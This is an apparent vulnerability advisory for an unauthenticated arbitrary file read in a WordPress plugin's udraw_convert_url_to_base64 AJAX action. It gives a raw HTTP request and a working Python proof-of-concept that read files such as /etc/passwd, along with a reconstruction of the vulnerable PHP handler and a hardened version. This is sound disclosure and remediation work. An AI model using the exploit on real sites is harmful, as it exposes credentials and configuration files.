The plugin does not validate the url parameter of its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before passing it to file_get_contents and returning the content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd or wp-config.php).
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Connection: close

action=udraw_convert_url_to_base64&url=/etc/passwd

#!/usr/bin/env python3
#
# Usage:
#   python3 poc.py <wordpress root url> <absolute filepath to include>
#
# Example:
#   python3 poc.py http://127.0.0.1:8080/ /etc/passwd
#
import sys
import base64
import requests

target_url = sys.argv[1]
filepath = sys.argv[2]

with requests.Session() as session:
    response = session.get(target_url)
    response = session.post(f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php", data={
        "action": "udraw_convert_url_to_base64",
        "url": filepath,
    })
    # The action answers with a data URI; the base64 payload follows the comma.
    b64_file = response.text.split(",")[1].strip('"')
    print(base64.b64decode(b64_file).decode())
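To show the fix from the defender's side, the following is an added example and not the plugin's own code or part of the original advisory. The first handler is a hypothetical reconstruction of the pattern the advisory describes (an AJAX action registered for both logged-in and anonymous users that hands the raw url parameter to file_get_contents); the second is a hardened handler. The nonce action name udraw_convert_url and the upload_files capability are assumptions; the WordPress functions used (check_ajax_referer, esc_url_raw, wp_parse_url, wp_safe_remote_get and the wp_remote_retrieve_* helpers) are real core APIs.

```php
<?php
// Added example (not the plugin's code). Hypothetical reconstruction of the
// vulnerable pattern the advisory describes, followed by a hardened handler.

// --- Vulnerable pattern (hypothetical reconstruction) -------------------------
function udraw_convert_url_to_base64_vulnerable() {
    $url  = $_POST['url'];              // taken as-is: a local path or php:// wrapper is accepted
    $data = file_get_contents( $url );  // reads local files, not just remote URLs
    wp_send_json( 'data:image/png;base64,' . base64_encode( $data ) );
}
// Registered for logged-in AND anonymous requests, as the advisory states.
add_action( 'wp_ajax_udraw_convert_url_to_base64',        'udraw_convert_url_to_base64_vulnerable' );
add_action( 'wp_ajax_nopriv_udraw_convert_url_to_base64', 'udraw_convert_url_to_base64_vulnerable' );

// --- Hardened handler ---------------------------------------------------------
function udraw_convert_url_to_base64_hardened() {
    // 1. Authorization: a nonce plus a capability check (names are assumptions).
    check_ajax_referer( 'udraw_convert_url', 'nonce' );
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 2. Input validation: only an absolute http(s) URL survives. esc_url_raw()
    //    drops any other scheme (file://, php://, data:) and a bare path such as
    //    /etc/passwd has no scheme or host, so it is rejected below.
    $url   = isset( $_POST['url'] ) ? wp_unslash( $_POST['url'] ) : '';
    $url   = esc_url_raw( $url, array( 'http', 'https' ) );
    $parts = wp_parse_url( $url );
    if ( '' === $url || empty( $parts['scheme'] ) || empty( $parts['host'] ) ) {
        wp_send_json_error( 'invalid url', 400 );
    }

    // 3. Fetch through the WP HTTP API instead of file_get_contents().
    //    wp_safe_remote_get() sets reject_unsafe_urls, which refuses loopback and
    //    private-range hosts, and it never touches the local filesystem.
    $response = wp_safe_remote_get( $url, array(
        'timeout'             => 10,
        'limit_response_size' => 5 * MB_IN_BYTES,
    ) );
    if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
        wp_send_json_error( 'fetch failed', 502 );
    }

    // 4. Output restriction: the feature converts images, so only image/* is returned.
    $ctype = (string) wp_remote_retrieve_header( $response, 'content-type' );
    if ( 0 !== strpos( $ctype, 'image/' ) ) {
        wp_send_json_error( 'unsupported content type', 415 );
    }
    $body = wp_remote_retrieve_body( $response );
    wp_send_json_success( 'data:' . $ctype . ';base64,' . base64_encode( $body ) );
}
// Logged-in users only: the nopriv hook is deliberately not registered.
add_action( 'wp_ajax_udraw_convert_url_to_base64', 'udraw_convert_url_to_base64_hardened' );
```

Two points decide the design. First, file_get_contents is the wrong primitive for "fetch a URL": it accepts local paths and stream wrappers, so scheme filtering alone is fragile; the WP HTTP client only speaks http(s), and the reject_unsafe_urls check also keeps the endpoint from becoming an SSRF hop into loopback or private networks. Second, the anonymous (wp_ajax_nopriv) registration is what turns a plugin bug into an unauthenticated file read; removing it and requiring a nonce plus capability shrinks the exposed surface even if validation is later bypassed. A residual caveat: the host check resolves the name once at validation time, so a hostname that changes its answer between check and fetch is not covered by this layer alone.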
cydave
Yes
2022-03-29
2022-04-13